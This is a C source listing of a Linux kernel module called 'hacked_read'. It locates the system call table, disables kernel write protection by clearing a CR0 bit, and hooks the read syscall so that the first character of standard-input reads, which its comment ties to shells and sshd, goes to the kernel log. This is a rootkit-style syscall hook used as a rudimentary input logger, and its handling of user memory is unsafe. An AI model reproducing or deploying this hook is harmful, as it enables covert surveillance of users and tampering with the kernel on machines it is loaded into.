#include <linux/module.h>#include <linux/kernel.h>#include <linux/init.h>#

1. #include <linux/module.h>
2. #include <linux/kernel.h>
3. #include <linux/init.h>
4. #include <linux/slab.h>
5. #include <linux/string.h>
6. #include <linux/syscalls.h>
7. #include <linux/version.h>
8. #include <linux/unistd.h>
9. #include <linux/time.h>
10. #include <linux/preempt.h>
11. #include <linux/delay.h>
12. #include <linux/cred.h>
13. #include <linux/sched.h>
14.  
15. #include <asm/uaccess.h>
16. #include <asm/paravirt.h>
17. #include <asm-generic/bug.h>
18. #include <asm/segment.h>
19. #include <asm/atomic.h>
20.  
21. #define BUFFER_SIZE 512
22. #define PID_MAX 32768
23.  
24. #define MODULE_NAME "hacked_read"
25.  
26. #define dbg( format, arg... )  do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
27. #define err( format, arg... )  pr_err(  MODULE_NAME ": " format, ## arg )
28. #define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
29. #define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
30.  
31. MODULE_DESCRIPTION( MODULE_NAME );
32. MODULE_VERSION( "0.2" );
33. MODULE_LICENSE( "GPL" );
34. MODULE_AUTHOR( "module author <mail@domain.com>" );
35.  
36.  
37. static DEFINE_SPINLOCK( mLock );
38. static unsigned long ( *original_read )  ( const struct pt_regs *regs );
39. void **sct;
40. static unsigned long flags; // irq flags
41.  
42. static atomic_t LOCK_NUMBER_ATOM        = ATOMIC_INIT(0);
43. static unsigned long long LOCK_NUMBER_ATOM_VAL;
44. static bool pids[ PID_MAX ];
45.  
46. static inline void rw_enable( void ) {
47.     asm volatile ( "pushq %rax \n"
48.         "movq %cr0, %rax \n"
49.         "andq $0xfffffffffffeffff, %rax \n"
50.         "movq %rax, %cr0 \n"
51.         "popq %rax " );
52. }
53.  
54. static inline uint64_t getcr0(void) {
55.     register uint64_t ret = 0;
56.     asm volatile (
57.         "movq %%cr0, %0\n"
58.         :"=r"(ret)
59.     );
60.     return ret;
61. }
62.  
63. static inline void rw_disable( register uint64_t val ) {
64.     asm volatile(
65.         "movq %0, %%cr0\n"
66.         :
67.         :"r"(val)
68.     );
69. }
70.  
71. static void* find_sym( const char *sym ) {
72.     static unsigned long faddr = 0; // static !!!
73.     // ----------- nested functions are a GCC extension ---------
74.     int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
75.         if( 0 == strcmp( (char*)data, sym ) ) {
76.             faddr = addr;
77.             return 1;
78.         } else return 0;
79.     };// --------------------------------------------------------
80.     kallsyms_on_each_symbol( symb_fn, (void*)sym );
81.     return (void*)faddr;
82. }
83.  
84. static unsigned long hacked_read_test( const struct pt_regs *regs ) {
85.     unsigned long r = 1;
86.     unsigned int fd = regs->di;
87.     char *buf = (char*) regs->si;
88.     atomic_inc( &LOCK_NUMBER_ATOM );
89.     pids[ task_pid_nr( current ) ] = true;
90.     r = original_read( regs );
91.     if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
92.         if ( strlen( buf ) > 0 )
93.             info( "hacked_read: %c\n", buf[ 0 ] );
94.     }
95.     atomic_dec( &LOCK_NUMBER_ATOM );
96.     pids[ task_pid_nr( current ) ] = false;
97.     return r;
98. }
99.  
100. int hacked_read_init( void ) {
101.     register uint64_t cr0;
102.     int cpu;
103.     sct = find_sym( "sys_call_table" );
104.     original_read = (void *)sct[ __NR_read ];
105.     for_each_present_cpu( cpu ) {
106.         spin_lock_irqsave( &mLock, flags );
107.         cr0 = getcr0( );
108.         rw_enable( );
109.         sct[ __NR_read ] = hacked_read_test;
110.         rw_disable( cr0 );
111.         spin_unlock_irqrestore( &mLock, flags );
112.     }
113.     info( "Module was loaded\n" );
114.     return 0;
115. }
116.  
117. void hacked_read_exit( void ) {
118.     register uint64_t cr0;
119.     int cpu;
120.     unsigned int i;
121.     for_each_present_cpu( cpu ) {
122.         spin_lock_irqsave( &mLock, flags );
123.         cr0 = getcr0( );
124.         rw_enable( );
125.         sct[__NR_read] = original_read;
126.         rw_disable( cr0 );
127.         spin_unlock_irqrestore( &mLock, flags );
128.     }
129.     LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
130.     while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
131.         info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
132.         for( i = 0; i < PID_MAX; i++ ) {
133.             if ( pids[ i ] ) {
134.                 info( "Locked. pid = %d\n", i );
135.             }
136.         }
137.         msleep( 5000 );
138.         LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
139.     }
140.     info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
141.     info( "Module was unloaded\n" );
142. }
143.  
144. module_init( hacked_read_init );
145. module_exit( hacked_read_exit );